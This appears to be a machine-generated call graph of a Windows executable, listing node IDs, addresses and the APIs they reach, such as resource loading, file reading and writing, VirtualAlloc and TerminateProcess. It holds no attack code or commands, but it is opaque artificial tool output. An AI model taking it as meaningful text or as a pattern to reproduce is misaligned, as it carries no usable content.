e4ea8 GetProcAddress 96964->96965 96966 e4ec6 96964->96966 96967 e4eb8 96965->96967 96969 10e5eb 96966->96969 96967->96966 96968 e4ebf FreeLibrary 96967->96968 96968->96966 97002 10e52a 96969->97002 96971 e4eea 96971->96905 96971->96906 96973 e4e6e GetProcAddress 96972->96973 96974 e4e8d 96972->96974 96975 e4e7e 96973->96975 96977 e4f80 96974->96977 96975->96974 96976 e4e86 FreeLibrary 96975->96976 96976->96974 96978 ffe0b 22 API calls 96977->96978 96979 e4f95 96978->96979 97054 e5722 96979->97054 96981 e4fa1 __fread_nolock 96982 e50a5 96981->96982 96983 123d1d 96981->96983 96993 e4fdc 96981->96993 97057 e42a2 CreateStreamOnHGlobal 96982->97057 97068 15304d 74 API calls 96983->97068 96986 123d22 96988 e511f 64 API calls 96986->96988 96987 e50f5 40 API calls 96987->96993 96989 123d45 96988->96989 96990 e50f5 40 API calls 96989->96990 96992 e506e messages 96990->96992 96992->96913 96993->96986 96993->96987 96993->96992 97063 e511f 96993->97063 96995 123d70 96994->96995 96996 e5107 96994->96996 97090 10e8c4 96996->97090 96999 1528fe 97127 15274e 96999->97127 97001 152919 97001->96921 97005 10e536 ___BuildCatchObject 97002->97005 97003 10e544 97027 10f2d9 20 API calls _abort 97003->97027 97005->97003 97007 10e574 97005->97007 97006 10e549 97028 1127ec 26 API calls pre_c_initialization 97006->97028 97009 10e586 97007->97009 97010 10e579 97007->97010 97019 118061 97009->97019 97029 10f2d9 20 API calls _abort 97010->97029 97013 10e58f 97014 10e5a2 97013->97014 97015 10e595 97013->97015 97031 10e5d4 LeaveCriticalSection __fread_nolock 97014->97031 97030 10f2d9 20 API calls _abort 97015->97030 97016 10e554 __fread_nolock 97016->96971 97020 11806d ___BuildCatchObject 97019->97020 97032 112f5e EnterCriticalSection 97020->97032 97022 11807b 97033 1180fb 97022->97033 97026 1180ac __fread_nolock 97026->97013 97027->97006 97028->97016 97029->97016 97030->97016 97031->97016 97032->97022 97040 11811e 97033->97040 97034 118088 97046 1180b7 97034->97046 97035 118177 97036 114c7d pre_c_initialization 20 API calls 97035->97036 97037 118180 97036->97037 97039 1129c8 _free 20 API calls 97037->97039 97041 118189 97039->97041 97040->97034 97040->97035 97049 10918d EnterCriticalSection 97040->97049 97050 1091a1 LeaveCriticalSection 97040->97050 97041->97034 97051 113405 11 API calls 2 library calls 97041->97051 97044 1181a8 97052 10918d EnterCriticalSection 97044->97052 97053 112fa6 LeaveCriticalSection 97046->97053 97048 1180be 97048->97026 97049->97040 97050->97040 97051->97044 97052->97034 97053->97048 97055 ffddb 22 API calls 97054->97055 97056 e5734 97055->97056 97056->96981 97058 e42bc FindResourceExW 97057->97058 97062 e42d9 97057->97062 97059 1235ba LoadResource 97058->97059 97058->97062 97060 1235cf SizeofResource 97059->97060 97059->97062 97061 1235e3 LockResource 97060->97061 97060->97062 97061->97062 97062->96993 97064 e512e 97063->97064 97065 123d90 97063->97065 97069 10ece3 97064->97069 97068->96986 97072 10eaaa 97069->97072 97071 e513c 97071->96993 97076 10eab6 ___BuildCatchObject 97072->97076 97073 10eac2 97085 10f2d9 20 API calls _abort 97073->97085 97075 10eae8 97087 10918d EnterCriticalSection 97075->97087 97076->97073 97076->97075 97077 10eac7 97086 1127ec 26 API calls pre_c_initialization 97077->97086 97080 10eaf4 97088 10ec0a 62 API calls 2 library calls 97080->97088 97082 10eb08 97089 10eb27 LeaveCriticalSection __fread_nolock 97082->97089 97084 10ead2 __fread_nolock 97084->97071 97085->97077 97086->97084 97087->97080 97088->97082 97089->97084 97093 10e8e1 97090->97093 97092 e5118 97092->96999 97094 10e8ed ___BuildCatchObject 97093->97094 97095 10e900 ___scrt_fastfail 97094->97095 97096 10e92d 97094->97096 97097 10e925 __fread_nolock 97094->97097 97120 10f2d9 20 API calls _abort 97095->97120 97106 10918d EnterCriticalSection 97096->97106 97097->97092 97099 10e937 97107 10e6f8 97099->97107 97102 10e91a 97121 1127ec 26 API calls pre_c_initialization 97102->97121 97106->97099 97110 10e70a ___scrt_fastfail 97107->97110 97113 10e727 97107->97113 97108 10e717 97123 10f2d9 20 API calls _abort 97108->97123 97110->97108 97110->97113 97115 10e76a __fread_nolock 97110->97115 97111 10e71c 97124 1127ec 26 API calls pre_c_initialization 97111->97124 97122 10e96c LeaveCriticalSection __fread_nolock 97113->97122 97114 10e886 ___scrt_fastfail 97126 10f2d9 20 API calls _abort 97114->97126 97115->97113 97115->97114 97117 10d955 __fread_nolock 26 API calls 97115->97117 97119 118d45 __fread_nolock 38 API calls 97115->97119 97125 10cf78 26 API calls 4 library calls 97115->97125 97117->97115 97119->97115 97120->97102 97121->97097 97122->97097 97123->97111 97124->97113 97125->97115 97126->97111 97130 10e4e8 97127->97130 97129 15275d 97129->97001 97133 10e469 97130->97133 97132 10e505 97132->97129 97134 10e478 97133->97134 97135 10e48c 97133->97135 97141 10f2d9 20 API calls _abort 97134->97141 97140 10e488 __alldvrm 97135->97140 97143 11333f 11 API calls 2 library calls 97135->97143 97137 10e47d 97142 1127ec 26 API calls pre_c_initialization 97137->97142 97140->97132 97141->97137 97142->97140 97143->97140 97149 152e7a 97144->97149 97145 152d3b 97145->96928 97145->96947 97146 e50f5 40 API calls 97146->97149 97147 1528fe 27 API calls 97147->97149 97148 e511f 64 API calls 97148->97149 97149->97145 97149->97146 97149->97147 97149->97148 97151 1522d9 97150->97151 97152 1522e7 97150->97152 97153 10e5eb 29 API calls 97151->97153 97154 15232c 97152->97154 97155 10e5eb 29 API calls 97152->97155 97178 1522f0 97152->97178 97153->97152 97179 152557 97154->97179 97156 152311 97155->97156 97156->97154 97158 15231a 97156->97158 97162 10e678 67 API calls 97158->97162 97158->97178 97159 152370 97160 152395 97159->97160 97161 152374 97159->97161 97183 152171 97160->97183 97164 152381 97161->97164 97166 10e678 67 API calls 97161->97166 97162->97178 97167 10e678 67 API calls 97164->97167 97164->97178 97165 15239d 97168 1523c3 97165->97168 97169 1523a3 97165->97169 97166->97164 97167->97178 97190 1523f3 97168->97190 97171 1523b0 97169->97171 97172 10e678 67 API calls 97169->97172 97173 10e678 67 API calls 97171->97173 97171->97178 97172->97171 97173->97178 97174 1523ca 97175 1523de 97174->97175 97198 10e678 97174->97198 97177 10e678 67 API calls 97175->97177 97175->97178 97177->97178 97178->96947 97180 152565 __fread_nolock 97179->97180 97181 15257c 97179->97181 97180->97159 97182 10e8c4 __fread_nolock 40 API calls 97181->97182 97182->97180 97184 10ea0c ___std_exception_copy 21 API calls 97183->97184 97185 15217f 97184->97185 97186 10ea0c ___std_exception_copy 21 API calls 97185->97186 97187 152190 97186->97187 97188 10ea0c ___std_exception_copy 21 API calls 97187->97188 97189 15219c 97188->97189 97189->97165 97191 152408 97190->97191 97192 1524c0 97191->97192 97194 1524c7 97191->97194 97195 1521cc 40 API calls 97191->97195 97211 152606 97191->97211 97219 152269 40 API calls 97191->97219 97215 152724 97192->97215 97194->97174 97195->97191 97199 10e684 ___BuildCatchObject 97198->97199 97200 10e695 97199->97200 97201 10e6aa 97199->97201 97272 10f2d9 20 API calls _abort 97200->97272 97210 10e6a5 __fread_nolock 97201->97210 97255 10918d EnterCriticalSection 97201->97255 97203 10e69a 97273 1127ec 26 API calls pre_c_initialization 97203->97273 97206 10e6c6 97256 10e602 97206->97256 97208 10e6d1 97274 10e6ee LeaveCriticalSection __fread_nolock 97208->97274 97210->97175 97213 15261d 97211->97213 97214 152617 97211->97214 97213->97191 97213->97213 97214->97213 97220 1526d7 97214->97220 97216 152731 97215->97216 97217 152742 97215->97217 97218 10dbb3 65 API calls 97216->97218 97217->97194 97218->97217 97219->97191 97221 152703 97220->97221 97222 152714 97220->97222 97224 10dbb3 97221->97224 97222->97214 97225 10dbc1 97224->97225 97230 10dbdd 97224->97230 97226 10dbe3 97225->97226 97227 10dbcd 97225->97227 97225->97230 97233 10d9cc 97226->97233 97236 10f2d9 20 API calls _abort 97227->97236 97230->97222 97231 10dbd2 97237 1127ec 26 API calls pre_c_initialization 97231->97237 97238 10d97b 97233->97238 97236->97231 97237->97230 97239 10d987 ___BuildCatchObject 97238->97239 97246 10918d EnterCriticalSection 97239->97246 97241 10d995 97247 10d9f4 97241->97247 97246->97241 97248 1149a1 27 API calls 97247->97248 97249 10da09 97248->97249 97250 10da3a 62 API calls 97249->97250 97251 10da24 97250->97251 97252 114a56 62 API calls 97251->97252 97255->97206 97257 10e624 97256->97257 97258 10e60f 97256->97258 97263 10e61f 97257->97263 97275 10dc0b 97257->97275 97300 10f2d9 20 API calls _abort 97258->97300 97260 10e614 97301 1127ec 26 API calls pre_c_initialization 97260->97301 97263->97208 97267 10d955 __fread_nolock 26 API calls 97268 10e646 97267->97268 97285 11862f 97268->97285 97272->97203 97273->97210 97274->97210 97276 10dc1f 97275->97276 97277 10dc23 97275->97277 97281 114d7a 97276->97281 97277->97276 97278 10d955 __fread_nolock 26 API calls 97277->97278 97279 10dc43 97278->97279 97302 1159be 97279->97302 97282 114d90 97281->97282 97283 10e640 97281->97283 97282->97283 97284 1129c8 _free 20 API calls 97282->97284 97283->97267 97284->97283 97286 118653 97285->97286 97287 11863e 97285->97287 97289 11868e 97286->97289 97294 11867a 97286->97294 97417 10f2c6 20 API calls _abort 97287->97417 97300->97260 97301->97263 97303 1159ca ___BuildCatchObject 97302->97303 97304 1159d2 97303->97304 97305 1159ea 97303->97305 97381 10f2c6 20 API calls _abort 97304->97381 97307 115a88 97305->97307 97311 115a1f 97305->97311 97386 10f2c6 20 API calls _abort 97307->97386 97308 1159d7 97381->97308 97466 ef7bf 97467 efcb6 97466->97467 97468 ef7d3 97466->97468 97560 eaceb 23 API calls messages 97467->97560 97470 efcc2 97468->97470 97471 ffddb 22 API calls 97468->97471 97561 eaceb 23 API calls messages 97470->97561 97473 ef7e5 97471->97473 97473->97470 97474 ef83e 97473->97474 97475 efd3d 97473->97475 97481 eed9d messages 97474->97481 97501 f1310 97474->97501 97562 151155 22 API calls 97475->97562 97478 134beb 97566 15359c 82 API calls __wsopen_s 97478->97566 97480 efef7 97480->97481 97485 ea8c7 22 API calls 97480->97485 97483 134600 97483->97481 97488 ea8c7 22 API calls 97483->97488 97484 134b0b 97564 15359c 82 API calls __wsopen_s 97484->97564 97485->97481 97488->97481 97490 100242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97498 eec76 messages 97490->97498 97491 ea8c7 22 API calls 97491->97498 97492 efbe3 97492->97481 97494 134bdc 97492->97494 97499 ef3ae messages 97492->97499 97493 ea961 22 API calls 97493->97498 97565 15359c 82 API calls __wsopen_s 97494->97565 97496 ffddb 22 API calls 97496->97498 97497 1000a3 29 API calls pre_c_initialization 97497->97498 97498->97478 97498->97480 97498->97481 97498->97483 97498->97484 97498->97490 97498->97491 97498->97492 97498->97493 97498->97496 97498->97497 97498->97499 97500 1001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97498->97500 97558 f01e0 256 API calls 2 library calls 97498->97558 97559 f06a0 41 API calls messages 97498->97559 97499->97481 97563 15359c 82 API calls __wsopen_s 97499->97563 97500->97498 97502 f1376 97501->97502 97503 f17b0 97501->97503 97504 136331 97502->97504 97506 f1940 9 API calls 97502->97506 97785 100242 5 API calls __Init_thread_wait 97503->97785 97796 16709c 256 API calls 97504->97796 97509 f13a0 97506->97509 97507 f17ba 97510 f17fb 97507->97510 97786 e9cb3 97507->97786 97512 f1940 9 API calls 97509->97512 97515 136346 97510->97515 97517 f182c 97510->97517 97511 13633d 97511->97498 97514 f13b6 97512->97514 97514->97510 97516 f13ec 97514->97516 97797 15359c 82 API calls __wsopen_s 97515->97797 97516->97515 97535 f1408 __fread_nolock 97516->97535 97793 eaceb 23 API calls messages 97517->97793 97520 f1839 97794 fd217 256 API calls 97520->97794 97521 f17d4 97792 1001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97521->97792 97524 13636e 97798 15359c 82 API calls __wsopen_s 97524->97798 97526 1363d1 97800 165745 54 API calls _wcslen 97526->97800 97527 f153c 97528 f1940 9 API calls 97527->97528 97530 f1549 97528->97530 97536 f1940 9 API calls 97530->97536 97537 f15c7 messages 97530->97537 97531 ffddb 22 API calls 97531->97535 97532 f1872 97532->97504 97795 ffaeb 23 API calls 97532->97795 97533 ffe0b 22 API calls 97533->97535 97535->97520 97535->97524 97535->97531 97535->97533 97535->97537 97541 eec40 256 API calls 97535->97541 97542 f152f 97535->97542 97545 1363b2 97535->97545 97539 f1563 97536->97539 97537->97532 97544 f1940 9 API calls 97537->97544 97547 f167b messages 97537->97547 97551 e4f39 68 API calls 97537->97551 97567 16958b 97537->97567 97570 feffa 97537->97570 97627 16959f 97537->97627 97630 15f0ec 97537->97630 97639 16e36a 97537->97639 97644 156ef1 97537->97644 97724 14d4ce 97537->97724 97727 15744a 97537->97727 97801 15359c 82 API calls __wsopen_s 97537->97801 97538 f171d 97538->97498 97539->97537 97548 ea8c7 22 API calls 97539->97548 97541->97535 97542->97526 97542->97527 97544->97537 97799 15359c 82 API calls __wsopen_s 97545->97799 97547->97538 97784 fce17 22 API calls messages 97547->97784 97548->97537 97551->97537 97558->97498 97559->97498 97560->97470 97561->97475 97562->97481 97563->97481 97564->97481 97565->97478 97566->97481 97802 167f59 97567->97802 97569 16959b 97569->97537 97935 e9c6e 97570->97935 97573 ffddb 22 API calls 97575 ff02b 97573->97575 97576 ffe0b 22 API calls 97575->97576 97578 ff03c 97576->97578 97577 13f0a8 97617 ff0a4 97577->97617 98010 159caa 39 API calls 97577->98010 97978 e6246 97578->97978 97582 ea961 22 API calls 97586 ff04f 97582->97586 97583 13f10a 97584 13f112 97583->97584 97585 ff0b1 97583->97585 97587 eb567 39 API calls 97584->97587 97949 ffa5b 97585->97949 97588 e6246 CloseHandle 97586->97588 97594 ff0b8 97587->97594 97590 ff056 97588->97590 97591 e7510 53 API calls 97590->97591 97592 ff062 97591->97592 97593 e6246 CloseHandle 97592->97593 97595 ff06c 97593->97595 97596 13f127 97594->97596 97597 ff0d3 97594->97597 97982 e5745 97595->97982 97600 ffe0b 22 API calls 97596->97600 97954 e6270 97597->97954 97603 13f12c 97600->97603 97613 13f140 97603->97613 98011 ff866 ReadFile SetFilePointerEx 97603->98011 97604 13f0a0 98009 e6216 CloseHandle messages 97604->98009 97605 ff085 97990 e53de 97605->97990 97609 ff0ea 97616 13f144 __fread_nolock 97609->97616 98006 e62b5 22 API calls 97609->98006 97613->97616 98012 150e85 22 API calls ___scrt_fastfail 97613->98012 97614 ff093 98005 e53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97614->98005 97617->97585 97973 eb567 97617->97973 97618 ff0fe 97621 ff138 97618->97621 97622 e6246 CloseHandle 97618->97622 97619 ff09a 97619->97617 97620 13f069 97619->97620 98008 14ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97620->98008 97621->97537 97623 ff12c 97622->97623 97623->97621 98007 e6216 CloseHandle messages 97623->98007 97625 13f080 97625->97617 97628 167f59 120 API calls 97627->97628 97629 1695af 97628->97629 97629->97537 97631 e7510 53 API calls 97630->97631 97632 15f126 97631->97632 98057 e9e90 97632->98057 97634 15f136 97635 15f15b 97634->97635 97636 eec40 256 API calls 97634->97636 97637 e9c6e 22 API calls 97635->97637 97638 15f15f 97635->97638 97636->97635 97637->97638 97638->97537 98099 1492c8 97639->98099 97641 16e376 98118 e62b5 22 API calls 97641->98118 97643 16e392 97643->97537 97645 ea961 22 API calls 97644->97645 97646 156f1d 97645->97646 97647 ea961 22 API calls 97646->97647 97648 156f26 97647->97648 97649 156f3a 97648->97649 97650 eb567 39 API calls 97648->97650 97651 e7510 53 API calls 97649->97651 97650->97649 97654 156f57 _wcslen 97651->97654 97652 156fbc 97655 e7510 53 API calls 97652->97655 97653 1570bf 97656 e4ecb 94 API calls 97653->97656 97654->97652 97654->97653 97723 1570e9 97654->97723 97657 156fc8 97655->97657 97658 1570d0 97656->97658 97661 ea8c7 22 API calls 97657->97661 97666 156fdb 97657->97666 97659 1570e5 97658->97659 97662 e4ecb 94 API calls 97658->97662 97660 ea961 22 API calls 97659->97660 97659->97723 97663 15711a 97660->97663 97661->97666 97662->97659 97664 ea961 22 API calls 97663->97664 97668 157126 97664->97668 97665 157027 97667 e7510 53 API calls 97665->97667 97666->97665 97669 157005 97666->97669 97673 ea8c7 22 API calls 97666->97673 97671 157034 97667->97671 97672 ea961 22 API calls 97668->97672 98293 e33c6 97669->98293 97675 157047 97671->97675 97676 15703d 97671->97676 97677 15712f 97672->97677 97673->97669 97674 15700f 97678 e7510 53 API calls 97674->97678 98302 14e199 GetFileAttributesW 97675->98302 97679 ea8c7 22 API calls 97676->97679 97681 ea961 22 API calls 97677->97681 97682 15701b 97678->97682 97679->97675 97684 157138 97681->97684 97685 e6350 22 API calls 97682->97685 97683 157050 97686 157063 97683->97686 97690 e4c6d 22 API calls 97683->97690 97687 e7510 53 API calls 97684->97687 97685->97665 97689 e7510 53 API calls 97686->97689 97696 157069 97686->97696 97688 157145 97687->97688 98139 e525f 97688->98139 97692 1570a0 97689->97692 97690->97686 98303 14d076 57 API calls 97692->98303 97693 157166 98181 e4c6d 97693->98181 97696->97723 97698 1571a9 97700 ea8c7 22 API calls 97698->97700 97699 e4c6d 22 API calls 97701 157186 97699->97701 97702 1571ba 97700->97702 97701->97698 97705 e6b57 22 API calls 97701->97705 97703 e6350 22 API calls 97702->97703 97704 1571c8 97703->97704 97706 e6350 22 API calls 97704->97706 97707 15719b 97705->97707 97708 1571d6 97706->97708 97709 e6b57 22 API calls 97707->97709 97710 e6350 22 API calls 97708->97710 97709->97698 97711 1571e4 97710->97711 97712 e7510 53 API calls 97711->97712 97713 1571f0 97712->97713 98184 14d7bc 97713->98184 97715 157201 97716 14d4ce 4 API calls 97715->97716 97717 15720b 97716->97717 97718 e7510 53 API calls 97717->97718 97721 157239 97717->97721 97719 157229 97718->97719 98238 152947 97719->98238 97722 e4f39 68 API calls 97721->97722 97722->97723 97723->97537 98323 14dbbe lstrlenW 97724->98323 97728 157469 97727->97728 97729 157474 97727->97729 97730 eb567 39 API calls 97728->97730 97733 ea961 22 API calls 97729->97733 97766 157554 97729->97766 97730->97729 97731 ffddb 22 API calls 97732 157587 97731->97732 97734 ffe0b 22 API calls 97732->97734 97735 157495 97733->97735 97736 157598 97734->97736 97737 ea961 22 API calls 97735->97737 97738 e6246 CloseHandle 97736->97738 97739 15749e 97737->97739 97741 1575a3 97738->97741 97740 e7510 53 API calls 97739->97740 97742 1574aa 97740->97742 97743 ea961 22 API calls 97741->97743 97744 e525f 22 API calls 97742->97744 97745 1575ab 97743->97745 97746 1574bf 97744->97746 97747 e6246 CloseHandle 97745->97747 97748 e6350 22 API calls 97746->97748 97749 1575b2 97747->97749 97750 1574f2 97748->97750 97751 e7510 53 API calls 97749->97751 97752 15754a 97750->97752 97754 14d4ce 4 API calls 97750->97754 97753 1575be 97751->97753 97756 eb567 39 API calls 97752->97756 97755 e6246 CloseHandle 97753->97755 97757 157502 97754->97757 97758 1575c8 97755->97758 97756->97766 97757->97752 97759 157506 97757->97759 97760 e5745 5 API calls 97758->97760 97761 e9cb3 22 API calls 97759->97761 97762 1575e2 97760->97762 97763 157513 97761->97763 97764 1576de GetLastError 97762->97764 97765 1575ea 97762->97765 98328 14d2c1 26 API calls 97763->98328 97768 1576f7 97764->97768 97770 e53de 27 API calls 97765->97770 97766->97731 97782 1576a4 97766->97782 98332 e6216 CloseHandle messages 97768->98332 97769 15751c 97769->97752 97772 1575f8 97770->97772 98329 e53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97772->98329 97774 157645 97775 ffddb 22 API calls 97774->97775 97778 157679 97775->97778 97776 1575ff 97776->97774 97777 157619 97776->97777 98330 14ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97777->98330 97780 ea961 22 API calls 97778->97780 97781 157686 97780->97781 97781->97782 98331 14417d 22 API calls __fread_nolock 97781->98331 97782->97537 97784->97547 97785->97507 97787 e9cc2 _wcslen 97786->97787 97788 ffe0b 22 API calls 97787->97788 97789 e9cea __fread_nolock 97788->97789 97790 ffddb 22 API calls 97789->97790 97791 e9d00 97790->97791 97791->97521 97792->97510 97793->97520 97794->97532 97795->97532 97796->97511 97797->97537 97798->97537 97799->97537 97800->97539 97801->97537 97840 e7510 97802->97840 97806 167fd5 messages 97806->97569 97807 16844f 97904 168ee4 60 API calls 97807->97904 97808 16828f 97876 167e86 97808->97876 97811 16845e 97811->97808 97812 16846a 97811->97812 97812->97806 97813 e7510 53 API calls 97831 168049 97813->97831 97818 1682c8 97891 ffc70 97818->97891 97821 168302 97898 e63eb 22 API calls 97821->97898 97822 1682e8 97897 15359c 82 API calls __wsopen_s 97822->97897 97825 168281 97825->97807 97825->97808 97826 168311 97899 e6a50 22 API calls 97826->97899 97827 1682f3 GetCurrentProcess TerminateProcess 97827->97821 97829 16832a 97838 168352 97829->97838 97900 f04f0 22 API calls 97829->97900 97831->97806 97831->97813 97831->97825 97895 14417d 22 API calls __fread_nolock 97831->97895 97896 16851d 42 API calls _strftime 97831->97896 97832 1684c5 97832->97806 97834 1684d9 FreeLibrary 97832->97834 97833 168341 97901 168b7b 75 API calls 97833->97901 97834->97806 97838->97832 97902 f04f0 22 API calls 97838->97902 97903 eaceb 23 API calls messages 97838->97903 97905 168b7b 75 API calls 97838->97905 97841 e7525 97840->97841 97856 e7522 97840->97856 97842 e752d 97841->97842 97843 e755b 97841->97843 97906 1051c6 26 API calls 97842->97906 97845 e756d 97843->97845 97852 12500f 97843->97852 97853 1250f6 97843->97853 97907 ffb21 51 API calls 97845->97907 97846 e753d 97851 ffddb 22 API calls 97846->97851 97849 12510e 97849->97849 97854 e7547 97851->97854 97857 ffe0b 22 API calls 97852->97857 97862 125088 97852->97862 97909 105183 26 API calls 97853->97909 97855 e9cb3 22 API calls 97854->97855 97855->97856 97856->97806 97863 168cd3 97856->97863 97858 125058 97857->97858 97859 ffddb 22 API calls 97858->97859 97860 12507f 97859->97860 97861 e9cb3 22 API calls 97860->97861 97861->97862 97908 ffb21 51 API calls 97862->97908 97864 eaec9 22 API calls 97863->97864 97865 168cee CharLowerBuffW 97864->97865 97910 148e54 97865->97910 97869 ea961 22 API calls 97870 168d2a 97869->97870 97917 e6d25 97870->97917 97872 168d3e 97873 e93b2 22 API calls 97872->97873 97875 168d48 _wcslen 97873->97875 97874 168e5e _wcslen 97874->97831 97875->97874 97930 16851d 42 API calls _strftime 97875->97930 97877 167ea1 97876->97877 97878 167eec 97876->97878 97879 ffe0b 22 API calls 97877->97879 97882 169096 97878->97882 97880 167ec3 97879->97880 97880->97878 97881 ffddb 22 API calls 97880->97881 97881->97880 97883 1692ab messages 97882->97883 97890 1690ba _strcat _wcslen 97882->97890 97883->97818 97884 eb6b5 39 API calls 97884->97890 97885 eb567 39 API calls 97885->97890 97886 eb38f 39 API calls 97886->97890 97887 e7510 53 API calls 97887->97890 97888 10ea0c 21 API calls ___std_exception_copy 97888->97890 97890->97883 97890->97884 97890->97885 97890->97886 97890->97887 97890->97888 97934 14efae 24 API calls _wcslen 97890->97934 97892 ffc85 97891->97892 97893 ffd1d VirtualAlloc 97892->97893 97894 ffceb 97892->97894 97893->97894 97894->97821 97894->97822 97895->97831 97896->97831 97897->97827 97898->97826 97899->97829 97900->97833 97901->97838 97902->97838 97903->97838 97904->97811 97905->97838 97906->97846 97907->97846 97908->97853 97909->97849 97911 148e74 _wcslen 97910->97911 97912 148ea9 97911->97912 97913 148f68 97911->97913 97916 148f63 97911->97916 97912->97916 97931 fce60 41 API calls 97912->97931 97913->97916 97932 fce60 41 API calls 97913->97932 97916->97869 97916->97875 97918 e6d34 97917->97918 97919 e6d91 97917->97919 97918->97919 97921 e6d3f 97918->97921 97920 e93b2 22 API calls 97919->97920 97927 e6d62 __fread_nolock 97920->97927 97922 e6d5a 97921->97922 97923 124c9d 97921->97923 97933 e6f34 22 API calls 97922->97933 97924 ffddb 22 API calls 97923->97924 97926 124ca7 97924->97926 97928 ffe0b 22 API calls 97926->97928 97927->97872 97929 124cda 97928->97929 97930->97874 97931->97912 97932->97913 97933->97927 97934->97890 97936 12f545 97935->97936 97938 e9c7e 97935->97938 97939 e6b57 22 API calls 97936->97939 97942 12f556 97936->97942 97937 ea6c3 22 API calls 97940 12f560 97937->97940 97941 ffddb 22 API calls 97938->97941 97939->97942 97940->97940 97943 e9c91 97941->97943 97942->97937 97944 e9cac 97943->97944 97945 e9c9a 97943->97945 97947 ea961 22 API calls 97944->97947 97946 e9cb3 22 API calls 97945->97946 97948 e9ca2 97946->97948 97947->97948 97948->97573 97948->97577 98013 e54c6 97949->98013 97952 e54c6 3 API calls 97953 ffa9a 97952->97953 97953->97594 97955 ffe0b 22 API calls 97954->97955 97956 e6295 97955->97956 97957 ffddb 22 API calls 97956->97957 97958 e62a3 97957->97958 97959 ff141 97958->97959 97960 ff188 97959->97960 97961 ff14c 97959->97961 97962 ea6c3 22 API calls 97960->97962 97961->97960 97963 ff15b 97961->97963 97970 14caeb 97962->97970 97965 ff170 97963->97965 97967 ff17d 97963->97967 97964 14cb1a 97964->97609 98019 ff18e 97965->98019 98026 14cbf2 26 API calls 97967->98026 97970->97964 98027 14ca89 ReadFile SetFilePointerEx 97970->98027 98028 e49bd 22 API calls __fread_nolock 97970->98028 97971 ff179 97971->97609 97974 eb578 97973->97974 97977 eb57f 97973->97977 97974->97977 98056 1062d1 39 API calls 97974->98056 97976 eb5c2 97976->97583 97977->97583 97979 e625f 97978->97979 97980 e6250 97978->97980 97979->97980 97981 e6264 CloseHandle 97979->97981 97980->97582 97981->97980 97983 e575c CreateFileW 97982->97983 97984 124035 97982->97984 97985 e577b 97983->97985 97984->97985 97986 12403b CreateFileW 97984->97986 97985->97604 97985->97605 97986->97985 97987 124063 97986->97987 97988 e54c6 3 API calls 97987->97988 97989 12406e 97988->97989 97989->97985 97991 e53f3 97990->97991 98004 e53f0 messages 97990->98004 97992 e54c6 3 API calls 97991->97992 97991->98004 97993 e5410 97992->97993 97994 e541d 97993->97994 97995 123f4b 97993->97995 97997 ffe0b 22 API calls 97994->97997 97996 ffa5b 3 API calls 97995->97996 97996->98004 97998 e5429 97997->97998 97999 e5722 22 API calls 97998->97999 98000 e5433 97999->98000 98001 e9a40 2 API calls 98000->98001 98002 e543f 98001->98002 98003 e54c6 3 API calls 98002->98003 98003->98004 98004->97614 98005->97619 98006->97618 98007->97621 98008->97625 98009->97577 98010->97577 98011->97613 98012->97616 98017 e54dd 98013->98017 98014 e5564 SetFilePointerEx SetFilePointerEx 98016 e5530 98014->98016 98015 123f9c SetFilePointerEx 98016->97952 98017->98014 98017->98015 98017->98016 98018 123f8b 98017->98018 98018->98015 98029 ff1d8 98019->98029 98025 ff1c1 98025->97971 98026->97971 98027->97970 98028->97970 98030 ffe0b 22 API calls 98029->98030 98031 ff1ef 98030->98031 98032 ffddb 22 API calls 98031->98032 98033 ff1a6 98032->98033 98034 e97b6 98033->98034 98041 e9a1e 98034->98041 98036 e97fc 98036->98025 98040 e6e14 24 API calls 98036->98040 98038 e97c7 98038->98036 98048 e9a40 98038->98048 98054 e9b01 22 API calls __fread_nolock 98038->98054 98040->98025 98042 e9a2f 98041->98042 98043 12f378 98041->98043 98042->98038 98044 ffddb 22 API calls 98043->98044 98045 12f382 98044->98045 98046 ffe0b 22 API calls 98045->98046 98047 12f397 98046->98047 98049 e9abb 98048->98049 98053 e9a4e 98048->98053 98055 fe40f SetFilePointerEx 98049->98055 98050 e9a7c 98050->98038 98052 e9a8c ReadFile 98052->98050 98052->98053 98053->98050 98053->98052 98054->98038 98055->98053 98056->97976 98058 e6270 22 API calls 98057->98058 98084 e9eb5 98058->98084 98059 e9fd2 98086 ea4a1 22 API calls __fread_nolock 98059->98086 98061 e9fec 98061->97634 98064 12f7c4 98096 1496e2 84 API calls __wsopen_s 98064->98096 98065 12f699 98073 ffddb 22 API calls 98065->98073 98066 ea405 98066->98061 98098 1496e2 84 API calls __wsopen_s 98066->98098 98069 ea4a1 22 API calls 98069->98084 98071 ea6c3 22 API calls 98071->98084 98072 12f7d2 98097 ea4a1 22 API calls __fread_nolock 98072->98097 98075 12f754 98073->98075 98077 ffe0b 22 API calls 98075->98077 98076 12f7e8 98076->98061 98078 ea12c __fread_nolock 98077->98078 98078->98064 98078->98066 98081 eaec9 22 API calls 98082 ea0db CharUpperBuffW 98081->98082 98092 ea673 22 API calls 98082->98092 98084->98059 98084->98064 98084->98065 98084->98066 98084->98069 98084->98071 98084->98078 98084->98081 98085 e4573 41 API calls _wcslen 98084->98085 98087 ea587 98084->98087 98093 e48c8 23 API calls 98084->98093 98094 e49bd 22 API calls __fread_nolock 98084->98094 98095 ea673 22 API calls 98084->98095 98085->98084 98086->98061 98088 ea59d 98087->98088 98091 ea598 __fread_nolock 98087->98091 98089 12f80f 98088->98089 98090 ffe0b 22 API calls 98088->98090 98090->98091 98091->98084 98092->98084 98093->98084 98094->98084 98095->98084 98096->98072 98097->98076 98098->98061 98100 ea961 22 API calls 98099->98100 98101 1492de 98100->98101 98102 e6270 22 API calls 98101->98102 98103 1492f2 98102->98103 98104 148e54 41 API calls 98103->98104 98107 149314 98103->98107 98106 14930e 98104->98106 98105 148e54 41 API calls 98105->98107 98106->98107 98108 e6d25 22 API calls 98106->98108 98107->98105 98109 e6d25 22 API calls 98107->98109 98110 e6350 22 API calls 98107->98110 98111 1493b3 98107->98111 98114 149397 98107->98114 98108->98107 98109->98107 98110->98107 98112 ea8c7 22 API calls 98111->98112 98113 1493c2 98111->98113 98112->98113 98113->97641 98115 e6d25 22 API calls 98114->98115 